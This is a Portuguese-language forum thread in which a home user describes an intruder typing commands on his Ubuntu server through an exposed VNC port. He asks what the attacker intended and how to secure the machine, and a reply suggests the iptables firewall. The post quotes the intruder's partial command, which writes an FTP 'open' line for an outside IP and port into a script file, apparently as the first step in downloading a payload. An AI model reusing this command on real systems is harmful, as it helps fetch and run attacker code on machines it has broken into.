Invadiram meu 'servidor' Ubuntu 9.10 e começaram a digitar comandos...

[Espartano]

Olá pessoal!

Eu tinha um PC sobrando aqui, e resolvi colocar ele como servidor de mídia na rede local de casa. Aí aproveitei pra também deixar ele fazendo downloads. Abri as portas que uso pro eMule e pro Deluge (torrent) no modem. A configuração da rede local é a seguinte:

Modem ADSL (roteador) -> roteador wireless (modo bridge) -> PCs e notebooks

Aí resolvi deixar esse PC servidor sem teclado, monitor, etc. e instalei o VNC nele pra poder acessar remotamente na rede local. Abri as seguintes portas nele: 5500 e 5900 (pro VNC).

Aí pra brincar um pouoco, instalei o django e apache2 e redirecionei as portas 80 e 443 do meu IP fixo pro servidor (cujo IP na rede local é 10.1.1.2).

Estava controlando a maquina hoje no VNC e de repente vi que alguém começou a digitar alguns comandos. Desliguei a máquina, e o comando que estava sendo digitado era o seguinte:

cecho open 187.1.204.74 35632 >> ik &ech

Nesse ponto parou porque eu desliguei a máquina. O IP digitado nao é o meu.

Através disso dá pra imaginar o que estavam tentando fazer? Quais medidas de segurança posso fazer pra que isso não ocorra de novo? Já posso ter sofrido algum dano? Se sim, o que fazer pra minimizar?

Lembrando que isso pode ter ocorrido antes, já que apenas por sorte eu estava usando o VNC...

Aqui uma imagem do que estava acontecendo quando desliguei:

Valeu galera!!

[NEF]

Você precisa instalar e configurar o IPTABLES que é um Firewall para Linux